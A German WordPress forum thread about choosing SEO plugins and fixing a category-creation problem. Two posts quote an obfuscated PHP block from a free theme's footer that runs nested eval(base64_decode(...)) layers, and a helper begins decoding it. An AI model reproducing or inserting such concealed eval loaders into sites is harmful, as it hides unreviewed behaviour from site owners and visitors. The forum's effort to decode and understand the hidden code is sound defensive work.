SEO-Plugins oder besser selber programmieren?

• Hi an alle Wordpresser!

bevor ich mir ständig irgendeinen anderes Plugin installiere und durchteste frage ich doch lieber mal die erfahrenen WP-User :-D

Wie sieht es mit einem echt genialen SEO-Plugins aus?
    Oder einem SEO-Paket?
    Sicherlich wäre ich bereit mir dann das Hintergrundwissen anzueigenen um dieses Plugin zu bedienen/verwalten zu können, aber welches Plugin istder Favorit?

Oder wäre es anzuraten spezielle und direkte Eingriffe am WP-System selbst vorzunehmen? Kennt sich da jemand gut aus? Darf man das seitens WP überhaupt tun (copyright?) und wer könnte mich ggf. dabei programmiertechnisch unterstützen?
    Natürlich nicht umsonst...

Ich möchte gleich etwas vernünftiges Installieren und nicht ewig herumbasteln und vor allem möchte ich keine solchen Plugins mit undefinierbaren Hiroglyphen und Passagen im Quelltext wie zb dies hier:
    ........................................................................
    <?php /* WARNING: This file is protected by copyright law. To reverse engineer or decode this file is strictly prohibited. */
    [COLOR=Red]$o ="QAAAJztjbnEnZGtmdHQ6JWRrYgIFZnUlOTsoAUA5DQ4ODQ4As
    w4AsCAIDQ0Com5jOiVhaGhzYgKADQ0NAAAhZGh3fjwnOzh3b3cnY
    mRvAAJoJ2Nmc2IvIF4gLjw4OQGEZQAEa2hgbmlhaC8gaWZqYgGkZ
    XUAACg5DSc7ZidvdWJhOiVvc3MAAHc9KChzaHdwd3NvYmpidCkEA
    mRoaih1AKBjfiglJzkgVQCyJwgA...[/COLOR] )
    ........................................................................
    (Hier werden meiner Ansicht nach Daten von unbekannter Quelle ein- oder ausgelesen...Das Plugin ist zwar kostenlos, aber was dort im Hintergrund passiert ist mir nicht geheuer...Gibt es da vielleicht einen Decompiler um solchen Quelltext zu entschlüsseln?)

Beste Grüße
    Philipp

Einmal editiert, zuletzt von bacova (31. Mai 2009 um 18:11)

• Anzeige

Hallo!

Wenn du gerade an deiner Website arbeitest oder dein aktuelles Hosting überdenkst: Wir betreiben mit NetzLiving eine Hosting-Plattform, die speziell auf Performance, Sicherheit und einfache Verwaltung ausgelegt ist.

• ✔️ Schnelle Ladezeiten (optimiert für WordPress & Co.)
    • ✔️ Deutsche Server & DSGVO-konform
    • ✔️ Persönlicher Support (kein 0815-Ticket-System)

Mehr erfahren

• bWie sieht es mit einem echt genialen SEO-Plugins aus? Oder einem SEO-Paket?

WPSEO oder All-in-one-SEO Pack sollen recht vernünftig sein.

Zitat

Oder wäre es anzuraten spezielle und direkte Eingriffe am WP-System selbst vorzunehmen?

Nein, niemals. Maximal nachgeladen per Plugin, aber niemals direkt im Kern. Sonst kannst du nicht mehr ohne weiteres Updates einspielen.

Zitat

Darf man das seitens WP überhaupt tun (copyright?)

Sicher, die GPL erlaubt es dir, die Software vollständig an deine Bedürfnisse anzupassen.

Zitat

und wer könnte mich ggf. dabei programmiertechnisch unterstützen?
    Natürlich nicht umsonst...

Hier gibts ein Unterforum "Jobbörse", einfach da rein die Anfrage.

Zitat

(Hier werden meiner Ansicht nach Daten von unbekannter Quelle ein- oder ausgelesen...Das Plugin ist zwar kostenlos, aber was dort im Hintergrund passiert ist mir nicht geheuer...Gibt es da vielleicht einen Decompiler um solchen Quelltext zu entschlüsseln?)

Das kommt sicher aus dem Theme oder? Manche kostenlose haben sowas im Footer, häufig wird eine fremde Website "angepingt" um die Verbreitung des Themes zu messen. Meistens ist der Code doppelt Base64-codiert. Wenn du den vollständigen Code postet dann hol ich dir den Klartext raus.

• Hi MarX,

Danke für deine Antwort.

Okay...ich werde den WP-Quelltext lieber in Ruhe lassen :mrgreen:

Ich schaue mich mal nach den WPSEO oder All-in-one-SEO Packs um.
    Mit welchem Plugin würdest Du anfangen?

-----------------------------------------------

Nachstehend der komplette Code aus der Footer.php:
    Du hast recht, es ist eine Theme = zinmag remedy.

[COLOR=Red]<?php /* WARNING: This file is protected by copyright law. To reverse engineer or decode this file is strictly prohibited. */
    $o="QAAAJztjbnEnZGtmdHQ6JWRrYgIFZnUlOTsoAUA5DQ4ODQ4Asw4AsCAIDQ0Com5jOiVhaGhzYgKADQ0NAAAhZGh3fjwnOzh3b3cnYmRvAAJoJ2Nmc2IvIF4gLjw4OQGEZQAEa2hgbmlhaC8gaWZqYgGkZXUAACg5DSc7ZidvdWJhOiVvc3MAAHc9KChzaHdwd3NvYmpidCkEAmRoaih1AKBjfiglJzkgVQCyJwgAUFcnUwIBIDsoZjknJ0NidG4BAGBpYmMnZX4E3nBiZW9odHNuAwRpYGBiYmwFEgSRUGJlJ08BgydAvxABkSAEsg8BDvMAqQ9wDcJwd1gPcy8uPCcAQDg5DTsoZWhjfgCBb3NqazknMAANJwARAGI=";eval(base64_decode("JGxsbD0wO2V2YWwoYmFzZTY0X2RlY29kZSgiSkd4c2JHeHNiR3hzYkd4c1BTZGlZWE5sTmpSZlpHVmpiMlJsSnpzPSIpKTskbGw9MDtldmFsKCRsbGxsbGxsbGxsbCgiSkd4c2JHeHNiR3hzYkd3OUoyOXlaQ2M3IikpOyRsbGxsPTA7JGxsbGxsPTM7ZXZhbCgkbGxsbGxsbGxsbGwoIkpHdzlKR3hzYkd4c2JHeHNiR3hzS0NSdktUcz0iKSk7JGxsbGxsbGw9MDskbGxsbGxsPSgkbGxsbGxsbGxsbCgkbFsxXSk8PDgpKyRsbGxsbGxsbGxsKCRsWzJdKTtldmFsKCRsbGxsbGxsbGxsbCgiSkd4c2JHeHNiR3hzYkd4c2JHdzlKM04wY214bGJpYzciKSk7JGxsbGxsbGxsbD0xNjskbGxsbGxsbGw9IiI7Zm9yKDskbGxsbGw8JGxsbGxsbGxsbGxsbGwoJGwpOyl7aWYoJGxsbGxsbGxsbD09MCl7JGxsbGxsbD0oJGxsbGxsbGxsbGwoJGxbJGxsbGxsKytdKTw8OCk7JGxsbGxsbCs9JGxsbGxsbGxsbGwoJGxbJGxsbGxsKytdKTskbGxsbGxsbGxsPTE2O31pZigkbGxsbGxsJjB4ODAwMCl7JGxsbD0oJGxsbGxsbGxsbGwoJGxbJGxsbGxsKytdKTw8NCk7JGxsbCs9KCRsbGxsbGxsbGxsKCRsWyRsbGxsbF0pPj40KTtpZigkbGxsKXskbGw9KCRsbGxsbGxsbGxsKCRsWyRsbGxsbCsrXSkmMHgwZikrMztmb3IoJGxsbGw9MDskbGxsbDwkbGw7JGxsbGwrKykkbGxsbGxsbGxbJGxsbGxsbGwrJGxsbGxdPSRsbGxsbGxsbFskbGxsbGxsbC0kbGxsKyRsbGxsXTskbGxsbGxsbCs9JGxsO31lbHNleyRsbD0oJGxsbGxsbGxsbGwoJGxbJGxsbGxsKytdKTw8OCk7JGxsKz0kbGxsbGxsbGxsbCgkbFskbGxsbGwrK10pKzE2O2ZvcigkbGxsbD0wOyRsbGxsPCRsbDskbGxsbGxsbGxbJGxsbGxsbGwrJGxsbGwrK109JGxsbGxsbGxsbGwoJGxbJGxsbGxsXSkpOyRsbGxsbCsrOyRsbGxsbGxsKz0kbGw7fX1lbHNlJGxsbGxsbGxsWyRsbGxsbGxsKytdPSRsbGxsbGxsbGxsKCRsWyRsbGxsbCsrXSk7JGxsbGxsbDw8PTE7JGxsbGxsbGxsbC0tO31ldmFsKCRsbGxsbGxsbGxsbCgiSkd4c2JHeHNiR3hzYkd4c2JEMG5ZMmh5SnpzPSIpKTskbGxsbGw9MDtldmFsKCRsbGxsbGxsbGxsbCgiSkd4c2JHeHNiR3hzYkQwaVB5SXVKR3hzYkd4c2JHeHNiR3hzYkNnMk1pazciKSk7JGxsbGxsbGxsbGw9IiI7Zm9yKDskbGxsbGw8JGxsbGxsbGw7KXskbGxsbGxsbGxsbC49JGxsbGxsbGxsbGxsbCgkbGxsbGxsbGxbJGxsbGxsKytdXjB4MDcpO31ldmFsKCRsbGxsbGxsbGxsbCgiSkd4c2JHeHNiR3hzYkM0OUpHeHNiR3hzYkd4c2JHd3VKR3hzYkd4c2JHeHNiR3hzYkNnMk1Da3VJajhpT3c9PSIpKTtldmFsKCRsbGxsbGxsbGwpOw=="));return;?>[/COLOR]

Viele Grüße und Danke fürs übersetzen...
    mich würde auch mal das Tool interessieren mit dem du das entschlüssselst :-D

Philipp

• Ich schaue mich mal nach den WPSEO oder All-in-one-SEO Packs um.
    Mit welchem Plugin würdest Du anfangen?

WPSEO. Ist deutschsprachig, bringt eine gute Grundkonfiguration mit und der Autor hilft bei Problemen schnell weiter (tw. auch hier im Forum ;-))

Zitat

achstehend der komplette Code aus der Footer.php:

Achso ich brauch noch die functions.php, meist steht da welche Funktionen aufgerufen werden (der "Standard" gzinflate/base64 hat leider nicht geklappt ;-))

Zitat

mich würde auch mal das Tool interessieren mit dem du das entschlüssselst

Schau mal hier:
    http://forum.wordpress-deutschland.org/konfiguration/…che-fragen.html

Im Prinzip musst du nur die Funktionen aus der (vermutlich) functions.php aufrufen, nur ohne eval() (führt den Code aus). Einfach ein "echo" hin und du siehst den Code. Ist nur eine Verschleierung, keine wirkliche Verschlüsselung.

• Hi MarX,

vielen Dank für deine Antworten!
    habe gestern beide SEO Pluins installiert, aktiviert und nur von aussen begutachtet, ohne aber etwas zu ändern! Nun habe ich heute früh folgendes Problem festgestellt, das ich keine neue Kategorie mehr erstellen kann. Namen ändern geht aber...

Habe alle Plugins deaktiviert, ohne Erfolg.
    Habe dann den "kompletten" WP Order gegen eine alte 100% lauffähige Sicherungskopie getauscht, auch nix.

Ich wurschtel schon den ganzen Vormittag herum und es klappt nicht...
    Hatte mich belesen und manche User reden auch von einer .htaccess Datein, habe diese auf dem Server gesucht aber nicht gefunden, (alle Dateien sichtbar) dann einfach eine erstellt und in den Ordner wp-admin geladen, auch nix.
    .htaccess

Hast du damit schon Erfahrungen gemacht?
    ich denke das eines der SEO Plugins irgendwelche, Versionsprobleme, geänderte Rechte oder sonstigen Quark verursacht hat...

----------------------
    functions.php

<?php
    require_once(TEMPLATEPATH . '/controlpanel.php');
    if (function_exists('register_sidebar') )
    register_sidebars(2, array(

));

?>
    ----------------------

Danke + LG
    Philipp

Einmal editiert, zuletzt von bacova (30. Mai 2009 um 13:04)

• Habe dann den "kompletten" WP Order gegen eine alte 100% lauffähige Sicherungskopie getauscht, auch nix.

Inklusive Löschen der Core-Dateien? (Also alles außer wp-content/ und der wp-config.php)

PHP
    <?php
    require_once(TEMPLATEPATH . '/controlpanel.php'); 
    if (function_exists('register_sidebar') )
        register_sidebars(2, array(

));

?>

Und weiter gehts in der controlpanel.php.. :-) Oder kann ich mir das Theme irgendwo herunterladen? ... Ah ich habs schon. Da fehlte noch was bei dir.

Schritt 1:

PHP
    base64_decode(JGxsbD0wO2V2YWwoYmFzZTY0X2RlY29kZSgiSkd4c2JHeHNiR3hzYkd4c1BTZGlZWE5sTmpSZlpHVmpiMlJsSnpzPSIpKTskbGw9MDtldmFsKCRsbGxsbGxsbGxsbCgiSkd4c2JHeHNiR3hzYkd3OUoyOXlaQ2M3IikpOyRsbGxsPTA7JGxsbGxsPTM7ZXZhbCgkbGxsbGxsbGxsbGwoIkpHdzlKR3hzYkd4c2JHeHNiR3hzS0NSdktUcz0iKSk7JGxsbGxsbGw9MDskbGxsbGxsPSgkbGxsbGxsbGxsbCgkbFsxXSk8PDgpKyRsbGxsbGxsbGxsKCRsWzJdKTtldmFsKCRsbGxsbGxsbGxsbCgiSkd4c2JHeHNiR3hzYkd4c2JHdzlKM04wY214bGJpYzciKSk7JGxsbGxsbGxsbD0xNjskbGxsbGxsbGw9IiI7Zm9yKDskbGxsbGw8JGxsbGxsbGxsbGxsbGwoJGwpOyl7aWYoJGxsbGxsbGxsbD09MCl7JGxsbGxsbD0oJGxsbGxsbGxsbGwoJGxbJGxsbGxsKytdKTw8OCk7JGxsbGxsbCs9JGxsbGxsbGxsbGwoJGxbJGxsbGxsKytdKTskbGxsbGxsbGxsPTE2O31pZigkbGxsbGxsJjB4ODAwMCl7JGxsbD0oJGxsbGxsbGxsbGwoJGxbJGxsbGxsKytdKTw8NCk7JGxsbCs9KCRsbGxsbGxsbGxsKCRsWyRsbGxsbF0pPj40KTtpZigkbGxsKXskbGw9KCRsbGxsbGxsbGxsKCRsWyRsbGxsbCsrXSkmMHgwZikrMztmb3IoJGxsbGw9MDskbGxsbDwkbGw7JGxsbGwrKykkbGxsbGxsbGxbJGxsbGxsbGwrJGxsbGxdPSRsbGxsbGxsbFskbGxsbGxsbC0kbGxsKyRsbGxsXTskbGxsbGxsbCs9JGxsO31lbHNleyRsbD0oJGxsbGxsbGxsbGwoJGxbJGxsbGxsKytdKTw8OCk7JGxsKz0kbGxsbGxsbGxsbCgkbFskbGxsbGwrK10pKzE2O2ZvcigkbGxsbD0wOyRsbGxsPCRsbDskbGxsbGxsbGxbJGxsbGxsbGwrJGxsbGwrK109JGxsbGxsbGxsbGwoJGxbJGxsbGxsXSkpOyRsbGxsbCsrOyRsbGxsbGxsKz0kbGw7fX1lbHNlJGxsbGxsbGxsWyRsbGxsbGxsKytdPSRsbGxsbGxsbGxsKCRsWyRsbGxsbCsrXSk7JGxsbGxsbDw8PTE7JGxsbGxsbGxsbC0tO31ldmFsKCRsbGxsbGxsbGxsbCgiSkd4c2JHeHNiR3hzYkd4c2JEMG5ZMmh5SnpzPSIpKTskbGxsbGw9MDtldmFsKCRsbGxsbGxsbGxsbCgiSkd4c2JHeHNiR3hzYkQwaVB5SXVKR3hzYkd4c2JHeHNiR3hzYkNnMk1pazciKSk7JGxsbGxsbGxsbGw9IiI7Zm9yKDskbGxsbGw8JGxsbGxsbGw7KXskbGxsbGxsbGxsbC49JGxsbGxsbGxsbGxsbCgkbGxsbGxsbGxbJGxsbGxsKytdXjB4MDcpO31ldmFsKCRsbGxsbGxsbGxsbCgiSkd4c2JHeHNiR3hzYkM0OUpHeHNiR3hzYkd4c2JHd3VKR3hzYkd4c2JHeHNiR3hzYkNnMk1Da3VJajhpT3c9PSIpKTtldmFsKCRsbGxsbGxsbGwpOw==);

ergibt (einfach 1x base64_decode() drüberlaufen lassen):

So siehts nach dem 1. schritt aus. Ich seh schon, das wird was größeres, ich hab aber grad keine Zeit mir das näher anzuschauen was da genau passiert.

• ...Ja, ich habe ALLES gegen eine ältere Sicherungskopie getauscht! Den kompletten WP-Ordner mit allen Unterordnern! Also kann es nur noch an der Datenbank liegen? Aber dort habe ich auch nichts verändert oder selbst zugegriffen...

das mit dem [COLOR=#000000][COLOR=#0000CC]base64_decode[/COLOR][COLOR=#006600] [/COLOR][/COLOR]ist nicht so sehr wichtig, es war nur neugierde was das eigentlich ist und wohin es führt...

Habe Gestern noch eine gute Seite gefunden wo 10 Punkte über SEO aufgeführt sind, ich denke das wäre auch eine gute Lösung...??!?!

Top 10 Wordpress SEO-Tipps zur Onpage Suchmaschinenoptimierung SEO Marketing Blog

Danke + Beste Grpße
    Philipp

• ...Ja, ich habe ALLES gegen eine ältere Sicherungskopie getauscht! Den kompletten WP-Ordner mit allen Unterordnern! Also kann es nur noch an der Datenbank liegen? Aber dort habe ich auch nichts verändert oder selbst zugegriffen...

Wenn du eh alles gelöscht hast, dann kannst du ja sicherheitshalber auch die DB nochmal neu aufsetzen. Die Plugins haben sicher bei der Aktivierung irgendwelche Daten dort abgelegt.

Zitat

das mit dem [COLOR=#000000][COLOR=#0000CC]base64_decode[/COLOR][COLOR=#006600] [/COLOR][/COLOR]ist nicht so sehr wichtig, es war nur neugierde was das eigentlich ist und wohin es führt...

Wenn ich mal ein wenig Zeit finde und den Thread nicht aus den Augen verliere, dann schau ich mir das weiter an. Interessiert mich ja selber, offensichtlich hat sich der Autor da ziemliche Mühe beim Verschleiern gegeben... :-D

Zitat

Habe Gestern noch eine gute Seite gefunden wo 10 Punkte über SEO aufgeführt sind, ich denke das wäre auch eine gute Lösung...??!?!

Uh der Artikel ist ja uuuuuralt - 2 Jahre schon... :-D Nee, das sind schon vernünftige Tipps dabei, die Hälfte davon setze ich eigentlich bei jedem Blog zumindest ähnlich ein, schon aus Usability-Gründen (z.B. Breadcrumb-Navigation, Less-Plugin und Permalinks). Aber letztlich kommts immer auf deine persönlichen Anforderungen an - und bei SEO auch immer auf den Keyword-Bereich bei dem du nach vorn kommen willst. Je umkämpfter, desto mehr musst du natürlich tun.

• Wie kann ich die DB neu aufsetzen? Einfach löschen und mit gleichem Namen neu erstellen? puhh ist das alles kompliziert, ich hoffe ich muss in der Einrichtungsphase der Plugins nicht jede Woche immer wieder alles neu installieren und Fehlersuchen....:???:

Beste Grüße
    Philipp

• ah..nochmawas... in der wp-config.php befinden sich ja die Angaben über DB, Pswd, etc... würde es genügen wenn ich einfach eine neue DB und pswd anlege und nur die Angaben in der wp-config abändere? Kann ich damit zb. eine komplette Neuinstallation des WP umgehen?

Habe vor 2 Tagen die WPSEO und All-in-one-SEO Plugins "zusammen" installiert und einfach nur mal begutachtet.
    Warscheinlich schreibt einer der beiden Plugins in die Datenbank hinein und verursachte den Fehler. Ich vertraue nun beiden Plugins nicht mehr und weiß nicht wie ich jetzt weitermachen soll? Scheinbar sind das ja gute Plugins...was ich jetzt aber in Frage stellen möchte...Hat jemand Erfahrungen? habe die aktuelle wp-version drauf. Was kann ich jetzt noch gutes installieren ohne ständig ein problem zu verursachen und dann alles wieder abzureißen und von vorne anzufangen...

Viele Grüße
    PHI

• ah...nochmawas...wie kann ich die DB immer mal wieder zwischendurch sichern, gibt es ein kleines schnelles Programm. Zum normalen Datentransfer benutze ich "FileZilla" , kann ich damit auch die DB sichern?

Beste Grüße
    PHI

• Wie kann ich die DB neu aufsetzen? Einfach löschen und mit gleichem Namen neu erstellen?

Zum Beispiel. Oder nur die wp_*-Tabellen, falls du die DB an sich nicht löschen darfst.

Zitat

ah..nochmawas... in der wp-config.php befinden sich ja die Angaben über DB, Pswd, etc... würde es genügen wenn ich einfach eine neue DB und pswd anlege und nur die Angaben in der wp-config abändere? Kann ich damit zb. eine komplette Neuinstallation des WP umgehen?

Ja das geht auch. Es würde sogar genügen, einen anderen Tabellenpräfix anzugeben (wieder für den Fall, dass du selbst keine Datenbanken anlegen darfst).

Zitat

ich hoffe ich muss in der Einrichtungsphase der Plugins nicht jede Woche immer wieder alles neu installieren und Fehlersuchen

Kann durchaus vorkommen. Ich verwende zu Testzwecken ein (lokal installiertes) Testblog. Wenn da was kaputt geht ist das nicht so schlimm, das wird dann einfach neu aufgesetzt. Und wenn alles läuft dann schieb ichs auf die produktiven Installationen.

Ich kann dich aber beruhigen: wenn dein Blog erstmal so läuft wie du es willst, dann hast du damit wenig Arbeit. Einfach auf das wichtigste konzentrieren (Inhalte schaffen :D) und ab und zu mal ein paar Updates einspielen (geht ja heutzutage in den meisten Fällen bequem über das Dashboard).

Noch ein Tipp: Grade bei Plugins mit gleicher Funktion sollte man sehr vorsichtig sein - da ist die wahrscheinlichkeit hoch, dass sich beide irgendwie blockieren. Lieber nacheinander testen, oder in verschiedenen (Test-)Installationen.

Und zu deiner privaten Anfrage: wenn du Profi-Hilfe beim Einrichten brauchst, dann frag am besten mal im Jobbörse-Forum an. Da findet sich bestimmt jemand kompetentes.

• wenn du keine .htaccess in dem root verzeichnis von WP hast funzt auch kein WP Seo.

du musst als erstes mal die permanent links einstellen, das geht in der konfiguration, da stehen unten drunter die Einträge für die htaccess. Du kannst die auch automatisch schreiben lassen, dazu musst du aber der root schreibrechte geben. Also die Einträge da kopieren in eine echte Textdatei einfügen und dann als .htaccess in die root kopieren, nicht ins wp-admin.

Außerdem ist es sicher sinnvoll nur 1 Seo Plugin zu installieren, ansonsten beeinflussen die sich gegenseitig. Von doppelt gemoppelt rankst du nicht besser:mrgreen:

Jetzt mitmachen!

Sie haben noch kein Benutzerkonto auf unserer Seite? Registrieren Sie sich kostenlos und nehmen Sie an unserer Community teil!